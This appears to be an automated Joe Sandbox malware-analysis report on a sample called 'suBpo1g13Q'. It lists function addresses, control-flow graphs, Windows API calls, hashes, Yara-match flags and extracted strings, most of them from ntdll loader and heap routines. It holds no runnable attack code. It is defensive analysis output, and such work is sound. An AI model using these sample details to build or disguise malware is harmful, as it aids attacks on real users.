                                                                                                                • Instruction ID: 3305dd07d73b873dc2e0dd5e19a4ddccff7a46ea07299f00a924cf8dcf54441f
                                                                                                                • Opcode Fuzzy Hash: 00ab63f9ef8e81966b746e13758ab361d59b5ba028144b38ce8ba2053dde1a37
                                                                                                                • Instruction Fuzzy Hash: 9390023160140513D511715845047070009D7E1241F95C417A1424969DD766CA66A221
                                                                                                                Function 014E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 233 14e2c70-14e2c7c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 68db07dc0413c28bfcd5d67128c8c44dc3fcf7565a39dcd86976cfc812391763
                                                                                                                • Instruction ID: ecd51ec0050181a322ee9f8916a87e5033f5175dd079c565bf67f57234276cb3
                                                                                                                • Opcode Fuzzy Hash: 68db07dc0413c28bfcd5d67128c8c44dc3fcf7565a39dcd86976cfc812391763
                                                                                                                • Instruction Fuzzy Hash: 9B90023160148902D5107158840474A0005D7E1301F59C416A5424A69DC7A5C9A57221
                                                                                                                Function 014E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 235 14e35c0-14e35cc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 1d76cb490cd479af85c2dc59b4abf1ef77b0aab7e5086bfc0fe5cb3614edc206
                                                                                                                • Instruction ID: dbc346b5496f0770e227035629f61bc7b46cf938a7504d01c6d0c8ef29ec9535
                                                                                                                • Opcode Fuzzy Hash: 1d76cb490cd479af85c2dc59b4abf1ef77b0aab7e5086bfc0fe5cb3614edc206
                                                                                                                • Instruction Fuzzy Hash: 80900231A0550502D500715845147061005D7E1201F65C416A1424979DC7A5CA6566A2
                                                                                                                Function 0041497D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54threadwindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 41497d-414981 1 414903-414911 0->1 2 414983-414990 0->2 3 414933-414938 1->3 4 414913-414924 PostThreadMessageW 1->4 5 414993-414996 2->5 4->3 6 414926-414930 4->6 7 4149b6-4149ba 5->7 8 414998-41499c 5->8 6->3 7->5 9 4149bc-4149c0 7->9 8->7 10 41499e-4149a2 8->10 10->7 11 4149a4-4149a8 10->11 11->7 12 4149aa-4149ae 11->12 12->7 13 4149b0-4149b4 12->13 13->7 14 4149c1-4149d1 13->14
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(FxK39HI69,00000111,00000000,00000000), ref: 00414920
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID: 9$FxK39HI69$FxK39HI69
                                                                                                                • API String ID: 1836367815-475315799
                                                                                                                • Opcode ID: 7b0ccf5fd3cf1d913e7caf8232417b232f1e2177184001fc3bf09bf45ff6c7a4
                                                                                                                • Instruction ID: 976b43b91f9a037b988bc6e8d6009723c8ac4a1273100eac61ec6f3c0456fa88
                                                                                                                • Opcode Fuzzy Hash: 7b0ccf5fd3cf1d913e7caf8232417b232f1e2177184001fc3bf09bf45ff6c7a4
                                                                                                                • Instruction Fuzzy Hash: A3012DB19592443CFF31D9706881FEBBB984B81304F0980DFD94C9B297D5569D8583CA
                                                                                                                Function 00414824 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 15 414824-41482e 16 414831-414839 15->16 16->16 17 41483b-414841 16->17 18 414843-414851 17->18 19 4148a8-414911 call 42f103 call 42fb13 call 418073 call 404993 call 4257a3 17->19 18->19 30 414933-414938 19->30 31 414913-414924 PostThreadMessageW 19->31 31->30 32 414926-414930 31->32 32->30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: FxK39HI69$FxK39HI69
                                                                                                                • API String ID: 0-3041768509
                                                                                                                • Opcode ID: e809d10b2df605192260c225c11581352bf82915e723d6c3714eb547341594ba
                                                                                                                • Instruction ID: 7f762695ba48a771e042b5c2ae19c2afe9d40c742d9ed6acbf574584f19cbc1d
                                                                                                                • Opcode Fuzzy Hash: e809d10b2df605192260c225c11581352bf82915e723d6c3714eb547341594ba
                                                                                                                • Instruction Fuzzy Hash: 9D212671E40298BAEB319A61DC02FDF7F78CF82714F54415AFA407B281D6B85605C7A5
                                                                                                                Function 004148A3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 33 4148a3-4148b3 34 4148bc-414911 call 42fb13 call 418073 call 404993 call 4257a3 33->34 35 4148b7 call 42f103 33->35 44 414933-414938 34->44 45 414913-414924 PostThreadMessageW 34->45 35->34 45->44 46 414926-414930 45->46 46->44
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(FxK39HI69,00000111,00000000,00000000), ref: 00414920
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID: FxK39HI69$FxK39HI69
                                                                                                                • API String ID: 1836367815-3041768509
                                                                                                                • Opcode ID: 712bf6d8a0fd3c13a99f64cea5298bb847ecf6f573ffe100077d284699f795e1
                                                                                                                • Instruction ID: 06275326bfcfe334d665a737c0e6c814b1b47600fecc189605aa7a9ab7fdd71d
                                                                                                                • Opcode Fuzzy Hash: 712bf6d8a0fd3c13a99f64cea5298bb847ecf6f573ffe100077d284699f795e1
                                                                                                                • Instruction Fuzzy Hash: B4018871E40218B6DB219BA1DC02FDF7B7C9F81754F44406AFA047B281E6B85A06C7E9
                                                                                                                Function 0041489F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56threadwindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 47 41489f-4148b3 48 4148bc-414911 call 42fb13 call 418073 call 404993 call 4257a3 47->48 49 4148b7 call 42f103 47->49 58 414933-414938 48->58 59 414913-414924 PostThreadMessageW 48->59 49->48 59->58 60 414926-414930 59->60 60->58
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(FxK39HI69,00000111,00000000,00000000), ref: 00414920
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID: FxK39HI69$FxK39HI69
                                                                                                                • API String ID: 1836367815-3041768509
                                                                                                                • Opcode ID: 079961bf664a41a12839ba32e99da1bc88fb204c1504df03119bf553b2bce66d
                                                                                                                • Instruction ID: ebd93ba47acf01b312f30065a039388c1d3d66d99c084bea9912ab45183c46c8
                                                                                                                • Opcode Fuzzy Hash: 079961bf664a41a12839ba32e99da1bc88fb204c1504df03119bf553b2bce66d
                                                                                                                • Instruction Fuzzy Hash: 0C01BE71E40258B6EB219BA1DC02FDF7F789F81758F44406AFE047B281E6B85A06C7E5
                                                                                                                Function 0042D2C3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 208 42d2c3-42d304 call 404a23 call 42e1d3 RtlAllocateHeap
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(?,0041EE44,?,?,00000000,?,0041EE44,?,?,?), ref: 0042D2FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: a2f824270edb07da026668b3351f5c530ff532050f34b3e1bc380a0675382d08
                                                                                                                • Instruction ID: 94da825c5e0379175a4fc2619c67b3be0d438c602da57c229c1b9970ca3de9e8
                                                                                                                • Opcode Fuzzy Hash: a2f824270edb07da026668b3351f5c530ff532050f34b3e1bc380a0675382d08
                                                                                                                • Instruction Fuzzy Hash: F6E06D722042087BCA14EE59EC41EAB73ACDFC9710F100029FA08A7241CA70B9118BB9
                                                                                                                Function 0042D313 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 213 42d313-42d351 call 404a23 call 42e1d3 RtlFreeHeap
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8D000003,00000007,00000000,00000004,00000000,004178E6,000000F4), ref: 0042D34C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: f2383aa6925ab6171127b6a46be8bf85223e3a4f38de851793f92adcb4611226
                                                                                                                • Instruction ID: de78460a75d36d4374bd30a59f755e3c7b58459cb35acb6fba88effa7fc235cb
                                                                                                                • Opcode Fuzzy Hash: f2383aa6925ab6171127b6a46be8bf85223e3a4f38de851793f92adcb4611226
                                                                                                                • Instruction Fuzzy Hash: ABE092723002187BD614EE59EC41FAB77ADEFC9710F004419FE08A7641C670BD108BB9
                                                                                                                Function 0042D353 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 223 42d353-42d38c call 404a23 call 42e1d3 ExitProcess
                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,03606DCE,?,?,03606DCE), ref: 0042D387
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 00d430379dcb5ce6cf48f7915b54ce4f0b18540f15f5cebdaaf3d17163163789
                                                                                                                • Instruction ID: c130a3190356806db0a69e50bcfcbfdc1da52aee1636262697e61616a99991f0
                                                                                                                • Opcode Fuzzy Hash: 00d430379dcb5ce6cf48f7915b54ce4f0b18540f15f5cebdaaf3d17163163789
                                                                                                                • Instruction Fuzzy Hash: E8E04F36610214BBD520EA6ADC41F9B775CDFC5714F00442AFA08A7142C674B91187B4
                                                                                                                Function 014E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 228 14e2c0a-14e2c0f 229 14e2c1f-14e2c26 LdrInitializeThunk 228->229 230 14e2c11-14e2c18 228->230
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: e933643d2bd402a1c70d2beb2c9b76b129c67b5768589a95e4d345f28badb75c
                                                                                                                • Instruction ID: 7627eb4da1eeec7efbf268b741abcc1eeb06c3414949976c7f439cf47671bffd
                                                                                                                • Opcode Fuzzy Hash: e933643d2bd402a1c70d2beb2c9b76b129c67b5768589a95e4d345f28badb75c
                                                                                                                • Instruction Fuzzy Hash: 37B09B71D015C5C5DE11E764460CB177954B7D1701F15C167D3030653F4778C1E5E275

                                                                                                                Non-executed Functions

                                                                                                                Function 01522349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-2160512332
                                                                                                                • Opcode ID: 0b44cd157f8c513f2629ee80b4c8092ecd2f7c9e00c1484ec683c9d2d73f0aef
                                                                                                                • Instruction ID: d7302e2a642c7618318dfde74e668421b1043f02cde5208e84bd3a47bbaa8e45
                                                                                                                • Opcode Fuzzy Hash: 0b44cd157f8c513f2629ee80b4c8092ecd2f7c9e00c1484ec683c9d2d73f0aef
                                                                                                                • Instruction Fuzzy Hash: C092C3766083529FE721DF29C880F6BB7E8BB85710F14491EFA94DB2A0D770E844CB52
                                                                                                                Function 014D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • undeleted critical section in freed memory, xrefs: 0151542B
                                                                                                                • Critical section address, xrefs: 01515425, 015154BC, 01515534
                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01515543
                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015154CE
                                                                                                                • double initialized or corrupted critical section, xrefs: 01515508
                                                                                                                • corrupted critical section, xrefs: 015154C2
                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0151540A, 01515496, 01515519
                                                                                                                • Thread identifier, xrefs: 0151553A
                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015154E2
                                                                                                                • Invalid debug info address of this critical section, xrefs: 015154B6
                                                                                                                • Critical section debug info address, xrefs: 0151541F, 0151552E
                                                                                                                • Address of the debug info found in the active list., xrefs: 015154AE, 015154FA
                                                                                                                • Critical section address., xrefs: 01515502
                                                                                                                • 8, xrefs: 015152E3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                • API String ID: 0-2368682639
                                                                                                                • Opcode ID: 570a105855547e9f11150c6e91796e8d34d89d424b69604352f31710c99cd996
                                                                                                                • Instruction ID: cbf00edc6d1f5be00919fbfcaea24ce6cd813a275f4c04b1b1da8554aa43631d
                                                                                                                • Opcode Fuzzy Hash: 570a105855547e9f11150c6e91796e8d34d89d424b69604352f31710c99cd996
                                                                                                                • Instruction Fuzzy Hash: 0B81AFB1A40349AFEF21CF99C844FAEBBF5BB49714F60411AF504BB260E3B1A945CB50
                                                                                                                Function 014D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01512498
                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015124C0
                                                                                                                • @, xrefs: 0151259B
                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01512602
                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015122E4
                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015125EB
                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01512624
                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01512412
                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0151261F
                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01512409
                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01512506
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                • API String ID: 0-4009184096
                                                                                                                • Opcode ID: 2478a79844f0e067158a8ec65e796e262cb80fe9ebe86b97e50dda0320e066ba
                                                                                                                • Instruction ID: c2a1732ac9a0f7517bdb6c4558ca02bbf24d2189d39e975171247d871cf68704
                                                                                                                • Opcode Fuzzy Hash: 2478a79844f0e067158a8ec65e796e262cb80fe9ebe86b97e50dda0320e066ba
                                                                                                                • Instruction Fuzzy Hash: 09028FB1D002299BEF31DB54CC90B9EB7B8BB55704F1041DAE609AB251EB709F84CF69
                                                                                                                Function 01548B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                                                                • API String ID: 0-2515994595
                                                                                                                • Opcode ID: ce479c92ea8d198b1ec215ed8566ab7723089919ebb80bb82363e5906ea36451
                                                                                                                • Instruction ID: 22d1dcfa56d317b8918360c9cef4ca587fc48ad00235cfa6b3bf73e81592caca
                                                                                                                • Opcode Fuzzy Hash: ce479c92ea8d198b1ec215ed8566ab7723089919ebb80bb82363e5906ea36451
                                                                                                                • Instruction Fuzzy Hash: 1651F0715053019BD725CF59C848BABBBE8FF94358F58092EE999CB250E770E608C792
                                                                                                                Function 01550274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                • API String ID: 0-1700792311
                                                                                                                • Opcode ID: 2e4bcfff9d306a00752ee4ab30ea3940f42a83f5658669c2961f937167c136c6
                                                                                                                • Instruction ID: a07452ce7f89f6ca49872ea0b3315f9ab7daf10fa2f54500460d7be190806f17
                                                                                                                • Opcode Fuzzy Hash: 2e4bcfff9d306a00752ee4ab30ea3940f42a83f5658669c2961f937167c136c6
                                                                                                                • Instruction Fuzzy Hash: C3D1EA31600286DFDB62DF69C460AAEBFF1FF5A704F19804AF8459F2A2C7349981CB11
                                                                                                                Function 015289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • VerifierFlags, xrefs: 01528C50
                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01528A67
                                                                                                                • VerifierDebug, xrefs: 01528CA5
                                                                                                                • VerifierDlls, xrefs: 01528CBD
                                                                                                                • HandleTraces, xrefs: 01528C8F
                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01528B8F
                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01528A3D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                • API String ID: 0-3223716464
                                                                                                                • Opcode ID: 39e8e2a671b8e46b1c96405224508c3920fd9df5d6d9889a7c20fdfa6d343a58
                                                                                                                • Instruction ID: 70a1b087c43ab8cd5283c30841a96ad1a91f4ff01482d0b31fcf8d938be0dbff
                                                                                                                • Opcode Fuzzy Hash: 39e8e2a671b8e46b1c96405224508c3920fd9df5d6d9889a7c20fdfa6d343a58
                                                                                                                • Instruction Fuzzy Hash: 579138736053229FDB22DFA8C880B1E77E4FB96B14F46085EFA406F290D7709818C796
                                                                                                                Function 014AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                • API String ID: 0-1109411897
                                                                                                                • Opcode ID: cf4cffc2a9ec393ea0a9314cc2a9d3fdcf95612ad979345cb029fa4338d28aec
                                                                                                                • Instruction ID: 67f313f59be3dffa2246ce01257aa25f61522889fd4fa1b00ab282747586e986
                                                                                                                • Opcode Fuzzy Hash: cf4cffc2a9ec393ea0a9314cc2a9d3fdcf95612ad979345cb029fa4338d28aec
                                                                                                                • Instruction Fuzzy Hash: 0BA25D74A0562A8BDB65CF58CC887AEBBB5BF55300F5542EAD50DA73A0DB309E85CF00
                                                                                                                Function 014D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-792281065
                                                                                                                • Opcode ID: e191379bf3fed20c06d2a10721833766ca6957a337c86e68e9feb429d7e9ea04
                                                                                                                • Instruction ID: 14533bf910bedcf7da275a986b5df3977d6fc6e3af0c58c7bc80d26f2af7da8c
                                                                                                                • Opcode Fuzzy Hash: e191379bf3fed20c06d2a10721833766ca6957a337c86e68e9feb429d7e9ea04
                                                                                                                • Instruction Fuzzy Hash: 4D914770A403129BFF36DF19D854BAE3BA1BB51B24F12012FE5206F2A9D7B48846C795
                                                                                                                Function 0149645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014F9A2A
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 014F9A11, 014F9A3A
                                                                                                                • apphelp.dll, xrefs: 01496496
                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 014F9A01
                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014F99ED
                                                                                                                • LdrpInitShimEngine, xrefs: 014F99F4, 014F9A07, 014F9A30
                                                                                                                Memory Dump Source
